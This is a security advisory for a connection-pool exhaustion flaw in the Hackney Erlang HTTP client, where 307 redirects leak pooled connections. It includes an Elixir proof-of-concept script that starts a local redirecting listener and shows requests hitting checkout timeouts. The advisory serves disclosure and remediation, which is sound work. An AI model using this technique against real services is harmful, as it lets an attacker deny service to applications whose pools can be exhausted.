Hackney Connection Pool Exhaustion Vulnerability After 307 Redirects
Vulnerability
A denial-of-service vulnerability has been identified in Hackney, the Erlang HTTP client library, affecting all versions prior to 1.24.0. Hackney does not release a connection back to its pool after processing a 307 Temporary Redirect response, so each such response permanently consumes one slot in the pool until the pool is restarted. A remote attacker who controls, or can redirect, an endpoint the application sends requests to can trigger enough 307 responses to deplete the pool, causing application slowdowns or timeouts.
Impact
Exploitation of this vulnerability causes the connection pool to fill with connections that are marked in use but never returned. Once the pool's maximum size is reached, every subsequent request blocks waiting for a free connection and fails with a checkout timeout, so any feature of the application that depends on that pool stops working until the pool is restarted.
Reproduction
The vulnerability can be reproduced by sending a POST request through Hackney to a server that answers with a 307 Temporary Redirect response; a Hackney-based Elixir application with a small pool size makes the effect easy to observe. Each 307 response leaves one more connection stuck in the in-use state, and once the pool's maximum size is reached, subsequent requests time out waiting for a connection to become available.
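A reproduction script for the behaviour described in this section, added here as an example and not taken from the advisory or from Hackney's own code. It assumes an Elixir installation where Mix.install can fetch hackney, binds a throwaway listener on 127.0.0.1:8307 (a constructed stand-in for the remote endpoint that answers every request with an empty 307), and uses a pool of two connections; the pool name, port, option values and request body are the example's own choices.

```elixir
# Pin hackney below the fixed release so the leak described above can be observed;
# change the requirement to "~> 1.24" to confirm the fix.
Mix.install([{:hackney, "< 1.24.0"}])

defmodule RedirectServer do
  # Minimal keep-alive HTTP listener that answers every request with an empty 307.
  # This is a constructed stand-in for the attacker-controlled endpoint, not part of hackney.
  @response "HTTP/1.1 307 Temporary Redirect\r\n" <>
              "Location: /elsewhere\r\nContent-Length: 0\r\nConnection: keep-alive\r\n\r\n"

  def start(port) do
    {:ok, lsock} =
      :gen_tcp.listen(port, [:binary, packet: :http_bin, active: false, reuseaddr: true])

    spawn_link(fn -> accept_loop(lsock) end)
    :ok
  end

  defp accept_loop(lsock) do
    {:ok, sock} = :gen_tcp.accept(lsock)
    spawn_link(fn -> serve(sock) end)
    accept_loop(lsock)
  end

  # Read one request (request line, headers, body), reply 307, keep the socket open
  # so the client sees a reusable keep-alive connection.
  defp serve(sock) do
    with {:ok, {:http_request, _method, _uri, _vsn}} <- :gen_tcp.recv(sock, 0, 5_000),
         {:ok, body_len} <- read_headers(sock, 0),
         :ok <- drain_body(sock, body_len),
         :ok <- :gen_tcp.send(sock, @response) do
      serve(sock)
    else
      _ -> :gen_tcp.close(sock)
    end
  end

  defp read_headers(sock, len) do
    case :gen_tcp.recv(sock, 0, 5_000) do
      {:ok, {:http_header, _, :"Content-Length", _, v}} -> read_headers(sock, String.to_integer(v))
      {:ok, {:http_header, _, _, _, _}} -> read_headers(sock, len)
      {:ok, :http_eoh} -> {:ok, len}
      other -> other
    end
  end

  defp drain_body(_sock, 0), do: :ok

  defp drain_body(sock, len) do
    # The http_bin packet mode does not know about bodies, so read the body raw.
    :ok = :inet.setopts(sock, packet: :raw)
    result = :gen_tcp.recv(sock, len, 5_000)
    :ok = :inet.setopts(sock, packet: :http_bin)

    case result do
      {:ok, _} -> :ok
      other -> other
    end
  end
end

defmodule Repro do
  @pool :repro_pool
  @max_connections 2

  def run(port) do
    :ok = RedirectServer.start(port)
    _ = :hackney_pool.start_pool(@pool, max_connections: @max_connections, timeout: 10_000)
    url = "http://127.0.0.1:#{port}/submit"
    opts = [pool: @pool, follow_redirect: true, checkout_timeout: 1_000, recv_timeout: 2_000]
    headers = [{"content-type", "application/json"}]

    # One more request than the pool can hold. Every POST receives a 307; if the connection
    # is not returned to the pool, the last request finds nothing to check out and fails
    # with {:error, :checkout_timeout} instead of receiving its own 307.
    for n <- 1..(@max_connections + 1) do
      result =
        case :hackney.request(:post, url, headers, ~s({"n":#{n}}), opts) do
          {:ok, status, _resp_headers, ref} ->
            # Consume the (empty) body so hackney considers the response finished.
            {:ok, _} = :hackney.body(ref)
            {:ok, status}

          {:error, reason} ->
            {:error, reason}
        end

      IO.puts("request #{n}: #{inspect(result)} pool(in_use, free, queued)=#{inspect(pool_usage())}")
      result
    end
  end

  # hackney's own pool statistics. in_use_count staying at max_connections after every
  # response body has been read is the signature of the leak.
  def pool_usage do
    stats = :hackney_pool.get_stats(@pool)
    {stats[:in_use_count], stats[:free_count], stats[:queue_count]}
  end
end

Repro.run(8307)
```

Run it with `elixir repro_307.exs`. On a vulnerable release, the behaviour this advisory describes predicts in_use_count remaining at 2 after the first two responses and the third request returning {:error, :checkout_timeout}; with the Mix requirement changed to "~> 1.24", all three requests should return {:ok, 307} and free_count should recover between them. The same :hackney_pool.get_stats/1 call is a cheap production check for a pool that is silently filling up.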
Remediation
Upgrade to Hackney version 1.24.0 or later, which returns the connection to the pool after a 307 Temporary Redirect response.
